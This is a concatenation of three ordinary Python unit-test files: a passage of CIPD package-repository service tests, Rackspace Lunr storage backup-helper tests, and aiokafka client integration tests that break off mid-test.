1)) # Prepare fake cipd binary package. out = StringIO.StringIO() zf = zipfile.ZipFile(out, 'w', zipfile.ZIP_DEFLATED) zf.writestr('cipd', 'cipd binary data here') zf.close() zipped = out.getvalue() digest = hashlib.sha1(zipped).hexdigest() # Pretend it is uploaded. self.mocked_cas_service.uploaded[('SHA1', digest)] = zipped # Register it as a package instance. self.mock(impl.utils, 'enqueue_task', lambda **_args: True) inst, registered = self.service.register_instance( package_name='infra/tools/cipd/linux-amd64', instance_id=digest, caller=auth.Identity.from_bytes('user:abc@example.com'), now=datetime.datetime(2014, 1, 1, 0, 0)) self.assertTrue(registered) expected = { 'registered_by': auth.Identity(kind='user', name='abc@example.com'), 'registered_ts': datetime.datetime(2014, 1, 1, 0, 0), 'processors_failure': [], 'processors_pending': ['cipd_client_binary:v1'], 'processors_success': [], } self.assertEqual(expected, inst.to_dict()) # get_client_binary_info indicated that processing is not done yet. instance = self.service.get_instance( package_name='infra/tools/cipd/linux-amd64', instance_id=digest) info, error_msg = self.service.get_client_binary_info(instance) self.assertIsNone(info) self.assertIsNone(error_msg) # Execute post-processing task: it would extract CIPD binary. self.service.process_instance( package_name='infra/tools/cipd/linux-amd64', instance_id=digest, processors=['cipd_client_binary:v1']) # Ensure succeeded. result = self.service.get_processing_result( package_name='infra/tools/cipd/linux-amd64', instance_id=digest, processor_name='cipd_client_binary:v1') self.assertEqual({ 'created_ts': datetime.datetime(2014, 1, 1, 0, 0), 'success': True, 'error': None, 'result': { 'client_binary': { 'hash_algo': 'SHA1', 'hash_digest': '5a72c1535f8d132c341585207504d94e68ef8a9d', 'size': 21, }, }, }, result.to_dict()) # Verify get_client_binary_info works too. instance = self.service.get_instance( package_name='infra/tools/cipd/linux-amd64', instance_id=digest) info, error_msg = self.service.get_client_binary_info(instance) expected = impl.ClientBinaryInfo( sha1='5a72c1535f8d132c341585207504d94e68ef8a9d', size=21, fetch_url=( 'https://signed-url/SHA1/5a72c1535f8d132c341585207504d94e68ef8a9d')) self.assertIsNone(error_msg) self.assertEqual(expected, info) def test_client_binary_extract_failure(self): self.mock(utils, 'utcnow', lambda: datetime.datetime(2014, 1, 1)) # Pretend some fake data is uploaded. self.mocked_cas_service.uploaded[('SHA1', 'a'*40)] = 'not a zip' # Register it as a package instance. self.mock(impl.utils, 'enqueue_task', lambda **_args: True) inst, registered = self.service.register_instance( package_name='infra/tools/cipd/linux-amd64', instance_id='a'*40, caller=auth.Identity.from_bytes('user:abc@example.com'), now=datetime.datetime(2014, 1, 1, 0, 0)) self.assertTrue(registered) expected = { 'registered_by': auth.Identity(kind='user', name='abc@example.com'), 'registered_ts': datetime.datetime(2014, 1, 1, 0, 0), 'processors_failure': [], 'processors_pending': ['cipd_client_binary:v1'], 'processors_success': [], } self.assertEqual(expected, inst.to_dict()) # Execute post-processing task: it would fail extracting CIPD binary. self.service.process_instance( package_name='infra/tools/cipd/linux-amd64', instance_id='a'*40, processors=['cipd_client_binary:v1']) # Ensure error is reported. result = self.service.get_processing_result( package_name='infra/tools/cipd/linux-amd64', instance_id='a'*40, processor_name='cipd_client_binary:v1') self.assertEqual({ 'created_ts': datetime.datetime(2014, 1, 1, 0, 0), 'success': False, 'error': 'File is not a zip file', 'result': None, }, result.to_dict()) # Verify get_client_binary_info reports it too. instance = self.service.get_instance( package_name='infra/tools/cipd/linux-amd64', instance_id='a'*40) info, error_msg = self.service.get_client_binary_info(instance) self.assertIsNone(info) self.assertEqual( 'Failed to extract the binary: File is not a zip file', error_msg) def test_set_package_ref(self): ident1 = auth.Identity.from_bytes('user:abc@example.com') now1 = datetime.datetime(2015, 1, 1, 0, 0) ident2 = auth.Identity.from_bytes('user:def@example.com') now2 = datetime.datetime(2016, 1, 1, 0, 0) self.service.register_instance( package_name='a/b', instance_id='a'*40, caller=ident1, now=datetime.datetime(2014, 1, 1, 0, 0)) self.service.register_instance( package_name='a/b', instance_id='b'*40, caller=ident1, now=datetime.datetime(2014, 1, 1, 0, 0)) ref = self.service.set_package_ref('a/b', 'ref', 'a'*40, ident1, now1) self.assertEqual({ 'instance_id': 'a'*40, 'modified_by': ident1, 'modified_ts': now1, }, ref.to_dict()) # Move to the same value -> modified_ts do not change. ref = self.service.set_package_ref('a/b', 'ref', 'a'*40, ident2, now2) self.assertEqual({ 'instance_id': 'a'*40, 'modified_by': ident1, 'modified_ts': now1, }, ref.to_dict()) # Move to another value. ref = self.service.set_package_ref('a/b', 'ref', 'b'*40, ident2, now2) self.assertEqual({ 'instance_id': 'b'*40, 'modified_by': ident2, 'modified_ts': now2, }, ref.to_dict()) # Code coverage for package_name. self.assertEqual('a/b', ref.package_name) def test_attach_detach_tags(self): _, registered = self.service.register_instance( package_name='a/b', instance_id='a'*40, caller=auth.Identity.from_bytes('user:abc@example.com'), now=datetime.datetime(2014, 1, 1, 0, 0)) self.assertTrue(registered) # Add a tag. attached = self.service.attach_tags( package_name='a/b', instance_id='a'*40, tags=['tag1:value1'], caller=auth.Identity.from_bytes('user:abc@example.com'), now=datetime.datetime(2014, 1, 1, 0, 0)) self.assertEqual( { 'tag1:value1': { 'registered_by': auth.Identity(kind='user', name='abc@example.com'), 'registered_ts': datetime.datetime(2014, 1, 1, 0, 0), 'tag': 'tag1:value1', }, }, {k: e.to_dict() for k, e in attached.iteritems()}) self.assertEqual('a/b', attached['tag1:value1'].package_name) self.assertEqual('a'*40, attached['tag1:value1'].instance_id) # Attempt to attach existing one (and one new). attached = self.service.attach_tags( package_name='a/b', instance_id='a'*40, tags=['tag1:value1', 'tag2:value2'], caller=auth.Identity.from_bytes('user:abc@example.com'), now=datetime.datetime(2015, 1, 1, 0, 0)) self.assertEqual( { 'tag1:value1': { 'registered_by': auth.Identity(kind='user', name='abc@example.com'), # Didn't change to 2015. 'registered_ts': datetime.datetime(2014, 1, 1, 0, 0), 'tag': 'tag1:value1', }, 'tag2:value2': { 'registered_by': auth.Identity(kind='user', name='abc@example.com'), 'registered_ts': datetime.datetime(2015, 1, 1, 0, 0), 'tag': 'tag2:value2', }, }, {k: e.to_dict() for k, e in attached.iteritems()}) # Get specific tags. tags = self.service.get_tags('a/b', 'a'*40, ['tag1:value1', 'missing:']) self.assertEqual( { 'tag1:value1': { 'registered_by': auth.Identity(kind='user', name='abc@example.com'), 'registered_ts': datetime.datetime(2014, 1, 1, 0, 0), 'tag': 'tag1:value1', }, 'missing:': None, }, {k: e.to_dict() if e else None for k, e in tags.iteritems()}) # Get all tags. Newest first. tags = self.service.query_tags('a/b', 'a'*40) self.assertEqual(['tag2:value2', 'tag1:value1'], [t.tag for t in tags]) # Search by specific tag (in a package). found = self.service.search_by_tag('tag1:value1', package_name='a/b') self.assertEqual( [('a/b', 'a'*40)], [(e.package_name, e.instance_id) for e in found]) # Search by specific tag (globally). Use callback to cover this code path. found = self.service.search_by_tag('tag1:value1') self.assertEqual( [('a/b', 'a'*40)], [(e.package_name, e.instance_id) for e in found]) # Cover callback usage. found = self.service.search_by_tag( 'tag1:value1', callback=lambda *_a: False) self.assertFalse(found) # Remove tag, search again -> missing. self.service.detach_tags('a/b', 'a'*40, ['tag1:value1', 'missing:']) found = self.service.search_by_tag('tag1:value1') self.assertFalse(found) def add_tagged_instance(self, package_name, instance_id, tags): self.service.register_instance( package_name=package_name, instance_id=instance_id, caller=auth.Identity.from_bytes('user:abc@example.com'), now=datetime.datetime(2014, 1, 1, 0, 0)) self.service.attach_tags( package_name=package_name, instance_id=instance_id, tags=tags, caller=auth.Identity.from_bytes('user:abc@example.com'), now=datetime.datetime(2014, 1, 1, 0, 0)) def test_resolve_version(self): self.add_tagged_instance('a/b', 'a'*40, ['tag1:value1', 'tag2:value2']) self.add_tagged_instance('a/b', 'b'*40, ['tag1:value1']) self.add_tagged_instance('a/b', 'c'*40, ['tag1:value1']) self.service.set_package_ref( 'a/b', 'ref', 'a'*40, auth.Identity.from_bytes('user:abc@example.com')) self.assertEqual([], self.service.resolve_version('a/b', 'd'*40, 2)) self.assertEqual([], self.service.resolve_version('a/b', 'tag3:', 2)) self.assertEqual([], self.service.resolve_version('a/b/c/d', 'a'*40, 2)) self.assertEqual([], self.service.resolve_version('a/b', 'not-such-ref', 2)) self.assertEqual(['a'*40], self.service.resolve_version('a/b', 'ref', 2)) self.assertEqual(['a'*40], self.service.resolve_version('a/b', 'a'*40, 2)) self.assertEqual( ['a'*40], self.service.resolve_version('a/b', 'tag2:value2', 2)) # No order guarantees when multiple results match. res = self.service.resolve_version('a/b', 'tag1:value1', 2) self.assertEqual(2, len(res)) self.assertTrue(set(['a'*40, 'b'*40, 'c'*40]).issuperset(res)) class MockedCASService(object): def __init__(self): self.uploaded = {} def is_fetch_configured(self): return True def generate_fetch_url(self, algo, digest): return 'https://signed-url/%s/%s' % (algo, digest) def is_object_present(self, algo, digest): return (algo, digest) in self.uploaded def create_upload_session(self, _algo, _digest, _caller): class UploadSession(object): upload_url = 'http://upload_url' return UploadSession(), 'upload_session_id' def open(self, hash_algo, hash_digest, read_buffer_size): assert read_buffer_size > 0 if not self.is_object_present(hash_algo, hash_digest): # pragma: no cover raise cas_impl.NotFoundError() return StringIO.StringIO(self.uploaded[(hash_algo, hash_digest)]) def start_direct_upload(self, hash_algo): assert hash_algo == 'SHA1' return cas_impl.DirectUpload( file_obj=StringIO.StringIO(), hasher=hashlib.sha1(), callback=lambda *_args: None) class MockedProcessor(processing.Processor): def __init__(self, name, error=None): self.name = name self.error = error def should_process(self, instance): return True def run(self, instance, data): if self.error: raise processing.ProcessingError(self.error) return { 'instance_id': instance.instance_id, 'package_name': instance.package_name, 'processor_name': self.name, }
#!/usr/bin/env python # Copyright (c) 2011-2016 Rackspace US, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. import unittest from contextlib import contextmanager from tempfile import mkdtemp from shutil import rmtree import os import sys import json import fcntl from time import sleep import logging from lunr.storage.helper.utils import jobs, ServiceUnavailable from lunr.storage.helper.utils.manifest import Manifest from lunr.storage.helper.utils.worker import Block from lunr.storage.helper import backup from lunr.storage.helper.utils.client import get_conn from lunr.storage.helper.utils.client import memory from lunr.common.config import LunrConfig from lunr.storage.helper.utils import NotFound from testlunr.unit import MockResourceLock, patch from lunr.storage.helper.utils.worker import BlockReadFailed logging.basicConfig() # from lunr.common import logger # logger.configure(log_to_console=True, capture_stdio=False) LOCKS = {} def _spawn(lock_file, job, *args, **kwargs): def run_job(): LOCKS[lock_file] = True try: callback = kwargs.pop('callback', lambda: None) error_callback = kwargs.pop('error_callback', lambda: None) skip_fork = kwargs.pop('skip_fork', None) try: job(*args, **kwargs) except: error_callback() return 1 callback() finally: try: del LOCKS[lock_file] except KeyError: pass if lock_file in LOCKS: raise jobs.JobAlreadyRunningError() _spawn.run_job = run_job return @contextmanager def mock_spawn(): _orig_spawn = backup.spawn try: backup.spawn = _spawn yield _spawn finally: backup.spawn = _orig_spawn class TestBackupHelper(unittest.TestCase): def setUp(self): memory.reset() self.scratch = mkdtemp() self.run_dir = os.path.join(self.scratch, 'run') self.backup_dir = os.path.join(self.scratch, 'backups') os.mkdir(self.backup_dir) self.conf = LunrConfig({ 'storage': {'run_dir': self.run_dir, 'skip_fork': True}, 'backup': {'client': 'disk'}, 'disk': {'path': self.backup_dir} }) def tearDown(self): rmtree(self.scratch) def test_get(self): snapshot = { 'id': 'test_snapshot', 'origin': 'test_volume' } backup_id = 'test_backup' info = { 'asdf': 42, 'id': backup_id, 'pid': os.getpid(), } h = backup.BackupHelper(self.conf) lock_file = h._resource_file(snapshot['id']) spawning_dir = os.path.dirname(lock_file) os.makedirs(spawning_dir) with open(lock_file, "w") as f: f.write(json.dumps(info)) # self.assertRaises(NotFound, h.get, snapshot, backup_id) backup_info = h.get(snapshot, backup_id) self.assertEquals(backup_info['lock'], lock_file) self.assertEquals(backup_info['status'], 'RUNNING') def test_get_with_junk_info(self): snapshot = { 'id': 'test_snapshot', 'origin': 'test_volume' } backup_id = 'test_backup' h = backup.BackupHelper(self.conf) lock_file = h._resource_file(snapshot['id']) spawning_dir = os.path.dirname(lock_file) os.makedirs(spawning_dir) with open(lock_file, "w") as f: f.write('THIS IS NOT JSON') self.assertRaises(NotFound, h.get, snapshot, backup_id) def test_create_first_backup_for_new_volume(self): h = backup.BackupHelper(self.conf) def callback(): callback.ran = True snapshot = { 'id': 'bak1', 'timestamp': 1.0, } snapshot['path'] = os.path.join(self.scratch, 'bak1') snapshot['origin'] = 'vol1' snapshot['size'] = 4 * 1024 * 1024 with open(snapshot['path'], 'w') as f: f.write('\x00' * snapshot['size']) backup_id = 'backup1' with mock_spawn() as j: h.create(snapshot, backup_id, callback) j.run_job() self.assert_(callback.ran) conn = get_conn(self.conf) _headers, raw_json_string = conn.get_object('vol1', 'manifest', newest=True) m = Manifest.loads(raw_json_string) self.assertEquals(m.block_count, 1) self.assertEquals(m.backups['backup1'], 1.0) self.assertEquals(m.history, [1.0]) self.assert_(isinstance(m[m.history[0]], list)) stats_path = h._stats_file('vol1') self.assertFalse(os.path.exists(stats_path)) def test_create_fail_ioerror(self): h = backup.BackupHelper(self.conf) def callback(): callback.ran = True callback.ran = False def error_callback(): error_callback.ran = True error_callback.ran = False snapshot = { 'id': 'bak1', 'timestamp': 1.0, } snapshot['path'] = os.path.join(self.scratch, 'bak1') snapshot['origin'] = 'vol1' snapshot['size'] = 4 * 1024 * 1024 with open(snapshot['path'], 'w') as f: f.write('\x00' * snapshot['size']) backup_id = 'backup1' def fake_hydrate(junk): raise BlockReadFailed("cant read!") with patch(Block, "_hydrate", fake_hydrate): h.create(snapshot, backup_id, callback=callback, error_callback=error_callback, lock=MockResourceLock()) self.assertFalse(callback.ran) self.assertTrue(error_callback.ran) stats_path = h._stats_file('vol1') self.assertFalse(os.path.exists(stats_path)) def test_create_first_backup_create_container(self): h = backup.BackupHelper(self.conf) conn = get_conn(self.conf) _orig_put_container = conn.put_container def mock_put_container(*args, **kwargs): # force the race sleep(0.2) mock_put_container.called.append(*args, **kwargs) _orig_put_container(*args, **kwargs) conn.put_container = mock_put_container mock_put_container.called = [] with patch(backup, 'get_conn', lambda *args: conn): snapshot = { 'id': 'bak1', 'timestamp': 1.0, } snapshot['path'] = os.path.join(self.scratch, 'bak1') snapshot['origin'] = 'vol1' snapshot['size'] = 16 * 1024 ** 2 with open(snapshot['path'], 'w') as f: f.write('\x00') f.seek(4 * 1024 ** 2, 1) f.write('\x01') f.seek(4 * 1024 ** 2, 1) f.write('\x02') backup_id = 'backup1' with mock_spawn() as j: h.create(snapshot, backup_id, lambda *args, **kwargs: None) j.run_job() # return doesn't matter, check it doesn't raise ClientException _headers, listing = conn.get_container(snapshot['origin']) # wrote 3 blocks + manifest. self.assertEquals(len(listing), 4) self.assertEquals(len(mock_put_container.called), 1) stats_path = h._stats_file('vol1') self.assertFalse(os.path.exists(stats_path)) def test_status(self): self.conf = LunrConfig({ 'storage': {'run_dir': self.run_dir, 'skip_fork': True}, 'backup': {'client': 'memory'}, }) h = backup.BackupHelper(self.conf) expected = {'client': 'memory', 'containers': 0, 'objects': 0} self.assertEquals(h.status(), expected) def test_status_client_exception(self): h = backup.BackupHelper(self.conf) conn = get_conn(self.conf) def mock_head_account(*args, **kwargs): raise conn.ClientException('unable to connect') conn.head_account = mock_head_account with patch(backup, 'get_conn', lambda *args: conn): self.assertRaises(ServiceUnavailable, h.status) def test_prune_no_manifest(self): h = backup.BackupHelper(self.conf) volume = {'id': 'vol1', 'size': 1} backup_id = 'unused' h.prune(volume, backup_id) # Shouldn't blow up on missing mainfest. self.assert_(True) def test_prune_missing_backup_id(self): h = backup.BackupHelper(self.conf) volume = {'id': 'vol1', 'size': 1} existing_backup_id = 'backup1' missing_backup_id = 'something_else' m = Manifest.blank(volume['size']) b = m.create_backup(existing_backup_id, timestamp=1.0) for i in range(volume['size']): b[i] = '00' conn = get_conn(self.conf) conn.put_container('vol1') conn.put_object('vol1', '00', 'asdf') conn.put_object('vol1', 'manifest', m.dumps()) h.prune(volume, missing_backup_id) # Shouldn't blow up on missing backup_id. self.assert_(True) def test_audit_no_manifest(self): h = backup.BackupHelper(self.conf) volume = {'id': 'vol1', 'size': 1} h.audit(volume) if __name__ == "__main__": unittest.main()
import asyncio import socket import types from typing import Any from unittest import mock from kafka.errors import ( KafkaError, KafkaConnectionError, RequestTimedOutError, NodeNotReadyError, UnrecognizedBrokerVersion ) from kafka.protocol.metadata import ( MetadataRequest_v0 as MetadataRequest, MetadataResponse_v0 as MetadataResponse) from kafka.protocol.fetch import FetchRequest_v0 from aiokafka import __version__ from aiokafka.client import AIOKafkaClient, ConnectionGroup, CoordinationType from aiokafka.conn import AIOKafkaConnection, CloseReason from aiokafka.util import create_task, get_running_loop from ._testutil import ( KafkaIntegrationTestCase, run_until_complete, kafka_versions ) NO_ERROR = 0 UNKNOWN_TOPIC_OR_PARTITION = 3 NO_LEADER = 5 REPLICA_NOT_AVAILABLE = 9 INVALID_TOPIC = 17 UNKNOWN_ERROR = -1 TOPIC_AUTHORIZATION_FAILED = 29 class TestKafkaClientIntegration(KafkaIntegrationTestCase): @run_until_complete async def test_init_with_list(self): client = AIOKafkaClient(bootstrap_servers=[ '127.0.0.1:9092', '127.0.0.2:9092', '127.0.0.3:9092']) self.assertEqual( f'<AIOKafkaClient client_id=aiokafka-{__version__}>', client.__repr__()) self.assertEqual( sorted([('127.0.0.1', 9092, socket.AF_INET), ('127.0.0.2', 9092, socket.AF_INET), ('127.0.0.3', 9092, socket.AF_INET)]), sorted(client.hosts)) node = client.get_random_node() self.assertEqual(node, None) # unknown cluster metadata @run_until_complete async def test_init_with_csv(self): client = AIOKafkaClient( bootstrap_servers='127.0.0.1:9092,127.0.0.2:9092,127.0.0.3:9092') self.assertEqual( sorted([('127.0.0.1', 9092, socket.AF_INET), ('127.0.0.2', 9092, socket.AF_INET), ('127.0.0.3', 9092, socket.AF_INET)]), sorted(client.hosts)) @run_until_complete async def test_load_metadata(self): brokers = [ (0, 'broker_1', 4567), (1, 'broker_2', 5678) ] topics = [ (NO_ERROR, 'topic_1', [ (NO_ERROR, 0, 1, [1, 2], [1, 2]) ]), (NO_ERROR, 'topic_2', [ (NO_LEADER, 0, -1, [], []), (NO_LEADER, 1, 1, [], []), ]), (NO_LEADER, 'topic_no_partitions', []), (UNKNOWN_TOPIC_OR_PARTITION, 'topic_unknown', []), (NO_ERROR, 'topic_3', [ (NO_ERROR, 0, 0, [0, 1], [0, 1]), (NO_ERROR, 1, 1, [1, 0], [1, 0]), (NO_ERROR, 2, 0, [0, 1], [0, 1]) ]), (NO_ERROR, 'topic_4', [ (NO_ERROR, 0, 0, [0, 1], [0, 1]), (REPLICA_NOT_AVAILABLE, 1, 1, [1, 0], [1, 0]), ]), (INVALID_TOPIC, 'topic_5', []), # Just ignored (UNKNOWN_ERROR, 'topic_6', []), # Just ignored (TOPIC_AUTHORIZATION_FAILED, 'topic_auth_error', []), ] async def send(request_id): return MetadataResponse(brokers, topics) mocked_conns = {(0, 0): mock.MagicMock()} mocked_conns[(0, 0)].send.side_effect = send client = AIOKafkaClient(bootstrap_servers=['broker_1:4567']) task = create_task(client._md_synchronizer()) client._conns = mocked_conns client.cluster.update_metadata(MetadataResponse(brokers[:1], [])) await client.force_metadata_update() task.cancel() md = client.cluster c_brokers = md.brokers() self.assertEqual(len(c_brokers), 2) expected_brokers = [ (0, 'broker_1', 4567, None), (1, 'broker_2', 5678, None) ] self.assertEqual(sorted(expected_brokers), sorted(list(c_brokers))) c_topics = md.topics() self.assertEqual(len(c_topics), 4) self.assertEqual(md.partitions_for_topic('topic_1'), {0}) self.assertEqual(md.partitions_for_topic('topic_2'), {0, 1}) self.assertEqual(md.partitions_for_topic('topic_3'), {0, 1, 2}) self.assertEqual(md.partitions_for_topic('topic_4'), {0, 1}) self.assertEqual( md.available_partitions_for_topic('topic_2'), {1}) mocked_conns[(0, 0)].connected.return_value = False is_ready = await client.ready(0) self.assertEqual(is_ready, False) is_ready = await client.ready(1) self.assertEqual(is_ready, False) self.assertEqual(mocked_conns, {}) with self.assertRaises(NodeNotReadyError): await client.send(0, None) self.assertEqual(md.unauthorized_topics, {'topic_auth_error'}) @run_until_complete async def test_send_timeout_deletes_connection(self): correct_response = MetadataResponse([], []) async def send_exception(*args, **kwargs): raise asyncio.TimeoutError() async def send(*args, **kwargs): return correct_response async def get_conn(self, node_id, *, group=0): conn_id = (node_id, group) if conn_id in self._conns: conn = self._conns[conn_id] if not conn.connected(): del self._conns[conn_id] else: return conn conn = mock.MagicMock() conn.send.side_effect = send self._conns[conn_id] = conn return conn node_id = 0 conn = mock.MagicMock() conn.send.side_effect = send_exception conn.connected.return_value = True mocked_conns = {(node_id, 0): conn} client = AIOKafkaClient(bootstrap_servers=['broker_1:4567']) client._conns = mocked_conns client._get_conn = types.MethodType(get_conn, client) # first send timeouts with self.assertRaises(RequestTimedOutError): await client.send(0, MetadataRequest([])) conn.close.assert_called_once_with( reason=CloseReason.CONNECTION_TIMEOUT) # this happens because conn was closed conn.connected.return_value = False # second send gets new connection and obtains result response = await client.send(0, MetadataRequest([])) self.assertEqual(response, correct_response) self.assertNotEqual(conn, client._conns[(node_id, 0)]) @run_until_complete async def test_client_receive_zero_brokers(self): brokers = [ (0, 'broker_1', 4567), (1, 'broker_2', 5678) ] correct_meta = MetadataResponse(brokers, []) bad_response = MetadataResponse([], []) async def send(*args, **kwargs): return bad_response client = AIOKafkaClient(bootstrap_servers=['broker_1:4567'], api_version="0.10") conn = mock.Mock() client._conns = [mock.Mock()] async def _get_conn(*args: Any, **kwargs: Any): return conn client._get_conn = mock.Mock() client._get_conn.side_effect = _get_conn conn.send = mock.Mock() conn.send.side_effect = send client.cluster.update_metadata(correct_meta) brokers_before = client.cluster.brokers() await client._metadata_update(client.cluster, []) # There broker list should not be purged self.assertNotEqual(client.cluster.brokers(), set()) self.assertEqual(client.cluster.brokers(), brokers_before) @run_until_complete async def test_client_receive_zero_brokers_timeout_on_send(self): brokers = [ (0, 'broker_1', 4567), (1, 'broker_2', 5678) ] correct_meta = MetadataResponse(brokers, []) async def send(*args, **kwargs): raise asyncio.TimeoutError() client = AIOKafkaClient(bootstrap_servers=['broker_1:4567'], api_version="0.10") conn = mock.Mock() client._conns = [mock.Mock()] async def _get_conn(*args: Any, **kwargs: Any): return conn client._get_conn = mock.Mock() client._get_conn.side_effect = _get_conn conn.send = mock.Mock() conn.send.side_effect = send client.cluster.update_metadata(correct_meta) brokers_before = client.cluster.brokers() await client._metadata_update(client.cluster, []) # There broker list should not be purged self.assertNotEqual(client.cluster.brokers(), set()) self.assertEqual(client.cluster.brokers(), brokers_before) @run_until_complete async def test_bootstrap(self): client = AIOKafkaClient(bootstrap_servers='0.42.42.42:444') with self.assertRaises(KafkaConnectionError): await client.bootstrap() client = AIOKafkaClient(bootstrap_servers=self.hosts) await client.bootstrap() await self.wait_topic(client, 'test_topic') metadata = await client.fetch_all_metadata() self.assertTrue('test_topic' in metadata.topics()) client.set_topics(['t2', 't3']) client.set_topics(['t2', 't3']) # should be ignored client.add_topic('t2') # should be ignored # bootstrap again -- no error expected await client.bootstrap() await client.close() @run_until_complete async def test_failed_bootstrap(self): client = AIOKafkaClient(bootstrap_servers=self.hosts) with mock.patch.object(AIOKafkaConnection, 'send') as mock_send: mock_send.side_effect = KafkaError('some kafka error') with self.assertRaises(KafkaConnectionError): await client.bootstrap() @run_until_complete async def test_failed_bootstrap_timeout(self): client = AIOKafkaClient(bootstrap_servers=self.hosts) with mock.patch.object(AIOKafkaConnection, 'send') as mock_send: mock_send.side_effect = asyncio.TimeoutError('Timeout error') with self.assertRaises(KafkaConnectionError): await client.bootstrap() @run_until_complete async def test_send_request(self): client = AIOKafkaClient(bootstrap_servers=self.hosts) await client.bootstrap() node_id = client.get_random_node() resp = await client.send(node_id, MetadataRequest([])) self.assertTrue(isinstance(resp, MetadataResponse)) await client.close() @kafka_versions('<2.6') # FIXME Not implemented yet @run_until_complete async def test_check_version(self): kafka_version = tuple(int(x) for x in self.kafka_version.split(".")) client = AIOKafkaClient(bootstrap_servers=self.hosts) await client.bootstrap() ver = await client.check_version() expected_version = kafka_version[:2] self.assertEqual(expected_version, ver[:2]) await self.wait_topic(client, 'some_test_topic') ver2 = await client.check_version() self.assertEqual(ver, ver2) ver2 = await client.check_version(client.get_random_node()) self.assertEqual(ver, ver2) with mock.patch.object( AIOKafkaConnection, 'send') as mocked: mocked.side_effect = KafkaError('mocked exception') with self.assertRaises(UnrecognizedBrokerVersion): await client.check_version(client.get_random_node()) async def _get_conn(*args: Any, **kw: Any): return None client._get_conn = _get_conn with self.assertRaises(KafkaConnectionError): await client.check_version() await client.close() @run_until_complete async def test_metadata_synchronizer(self): client = AIOKafkaClient( bootstrap_servers=self.hosts, api_version="0.9", metadata_max_age_ms=10) with mock.patch.object( AIOKafkaClient, '_metadata_update') as mocked: async def dummy(*d, **kw): client.cluster.failed_update(None) mocked.side_effect = dummy await client.bootstrap() # wait synchronizer task timeout await asyncio.sleep(0.1) self.assertNotEqual( len(client._metadata_update.mock_calls), 0) await client.close() @run_until_complete async def test_metadata_update_fail(self): client = AIOKafkaClient(bootstrap_servers=self.hosts) await client.bootstrap() # Make sure the connection is initialize before mock to avoid crashing # api_version routine await client.force_metadata_update() with mock.patch.object( AIOKafkaConnection, 'send') as mocked: mocked.side_effect = KafkaError('mocked exception') updated = await client.force_metadata_update() self.assertEqual(updated, False) with self.assertRaises(KafkaError): await client.fetch_all_metadata() await client.close() @run_until_complete async def test_force_metadata_update_multiple_times(self): client = AIOKafkaClient( bootstrap_servers=self.hosts, metadata_max_age_ms=10000) await client.bootstrap() self.add_cleanup(client.close) orig = client._metadata_update with mock.patch.object(client, '_metadata_update') as mocked: async def new(*args, **kw): await asyncio.sleep(0.2) return (await orig(*args, **kw)) mocked.side_effect = new client.force_metadata_update() await asyncio.sleep(0.01) self.assertEqual( len(client._metadata_update.mock_calls), 1) client.force_metadata_update() await asyncio.sleep(0.01) self.assertEqual( len(client._metadata_update.mock_calls), 1) client.force_metadata_update() await asyncio.sleep(0.5) self.assertEqual( len(client._metadata_update.mock_calls), 1) @run_until_complete async def test_set_topics_trigger_metadata_update(self): client = AIOKafkaClient( bootstrap_servers=self.hosts, metadata_max_age_ms=10000) await client.bootstrap() self.add_cleanup(client.close) orig = client._metadata_update with mock.patch.object(client, '_metadata_update') as mocked: async def new(*args, **kw): await asyncio.sleep(0.01) return (await orig(*args, **kw)) mocked.side_effect = new await client.set_topics(["topic1"]) self.assertEqual( len(client._metadata_update.mock_calls), 1) # Same topics list should not trigger update await client.set_topics(["topic1"]) self.assertEqual( len(client._metadata_update.mock_calls), 1) await client.set_topics(["topic1", "topic2"]) self.assertEqual( len(client._metadata_update.mock_calls), 2) # Less topics should not update too await client.set_topics(["topic2"]) self.assertEqual( len(client._metadata_update.mock_calls), 2) # Setting [] should force update as it means all topics await client.set_topics([]) self.assertEqual( len(client._metadata_update.mock_calls), 3) # Changing topics during refresh should trigger 2 refreshes client.set_topics(["topic3"]) await asyncio.sleep(0.001) self.assertEqual( len(client._metadata_update.mock_calls), 4) await client.set_topics(["topic3", "topics4"]) self.assertEqual( len(client._metadata_update.mock_calls), 5) @run_until_complete async def test_metadata_updated_on_socket_disconnect(self): # Related to issue 176. A disconnect means that either we lost # connection to the node, or we have a node failure. In both cases # there's a high probability that Leader distribution will also change. client = AIOKafkaClient( bootstrap_servers=self.hosts, metadata_max_age_ms=10000) await client.bootstrap() self.add_cleanup(client.close) # Init a clonnection node_id = client.get_random_node() assert node_id is not None req = MetadataRequest([]) await client.send(node_id, req) # No metadata update pending atm self.assertFalse(client._md_update_waiter.done()) # Connection disconnect should trigger an update conn = await client._get_conn(node_id) conn.close(reason=CloseReason.CONNECTION_BROKEN) self.assertTrue(client._md_update_waiter.done()) @run_until_complete async def test_no_concurrent_send_on_connection(self): client = AIOKafkaClient( bootstrap_servers=self.hosts, metadata_max_age_ms=10000) await client.bootstrap() self.add_cleanup(client.close) await self.wait_topic(client, self.topic) node_id = client.get_random_node() wait_request = FetchRequest_v0( -1, # replica_id 500, # max_wait_ms 1024 * 1024, # min_bytes [(self.topic, [(0, 0, 1024)] )]) vanila_request = MetadataRequest([]) loop = get_running_loop() send_time = loop.time() long_task = create_task( client.send(node_id, wait_request) ) await asyncio.sleep(0.0001) self.assertFalse(long_task.done()) await client.send(node_id, vanila_request) resp_time = loop.time() fetch_resp = await long_task # Check error code like resp->topics[0]->partitions[0]->error_code self.assertEqual(fetch_resp.topics[0][1][0][1], 0) # Check that vanila request actually executed after wait request self.assertGreaterEqual(resp_time - send_time, 0.5) @run_until_complete async def test_different_connections_in_conn_groups(self): client = AIOKafkaClient( bootstrap_servers=self.hosts, metadata_max_age_ms=10000) await client.bootstrap() self.add_cleanup(client.close) node_id = client.get_random_node() broker = client.cluster.broker_metadata(node_id) client.cluster.add_coordinator( node_id, broker.host, broker.port, rack=None, purpose=(CoordinationType.GROUP, "")) conn1 = await client._get_conn(node_id) conn2 = await client._get_conn( node_id, group=ConnectionGroup.COORDINATION) self.assertTrue(conn1 is not conn2) self.assertEqual((conn1.host, conn1.port), (conn2.host, conn2.port)) @run_until_complete async def test_concurrent_send_on_different_connection_groups(self): client = AIOKafkaClient( bootstrap_servers=self.hosts, metadata_max_age_ms=10000) await client.bootstrap() self.add_cleanup(client.close) await self.wait_topic(client, self.topic) node_id = 